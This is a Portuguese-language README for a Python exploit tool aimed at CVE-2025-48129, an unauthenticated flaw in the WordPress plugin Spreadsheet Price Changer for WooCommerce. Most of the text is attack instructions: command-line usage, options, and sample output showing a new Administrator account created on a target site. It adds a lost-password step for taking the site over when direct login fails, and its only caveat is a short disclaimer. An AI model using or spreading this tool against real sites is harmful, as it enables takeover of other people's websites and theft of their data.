
O plugin WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 é vulnerável a Escalação de Privilégios.
<= 2.4.37CVE-2025-481299.8 (Crítico)Atacantes não autenticados podem escalar privilégios criando uma conta de nível Administrador sem precisar de qualquer acesso prévio. Isso permite a tomada total do site WordPress.
Classificado como: OWASP A7 – Falhas de Identificação e Autenticação
Este script Python tem como alvo versões vulneráveis do plugin e registra um novo Administrador WordPress usando apenas um e-mail e senha (com hash via MD5).
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin
python CVE-2025-48129.py -help
usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]
CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://site.com/)
-mail, --mail MAIL Email for the new Admin account
-p, --password PASSWORD Password to set (default: nxploitadmin)
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!
[*] Login credentials:
Username: [email protected]
Password: 21232f297a57a5a743894a0e4a801fc3
[*] If login fails, reset the password manually via:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
Em alguns casos, fazer login diretamente com a senha escolhida pode falhar.
Isso não é um bug no exploit, mas um resultado de como o plugin vulnerável passa senhas com hash para o sistema interno de criação de usuários do WordPress.
Se você não conseguir fazer login, simplesmente redefina a senha via e-mail usando a seguinte URL:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
O WordPress enviará um e-mail de redefinição de senha para a conta de Administrador que você acabou de criar — concedendo acesso total a você.
Esta ferramenta é fornecida apenas para fins educacionais e de testes de penetração autorizados.
O autor não assume responsabilidade por uso indevido ou danos causados por este script.
Por: Nxploited ( Khaled_alenazi )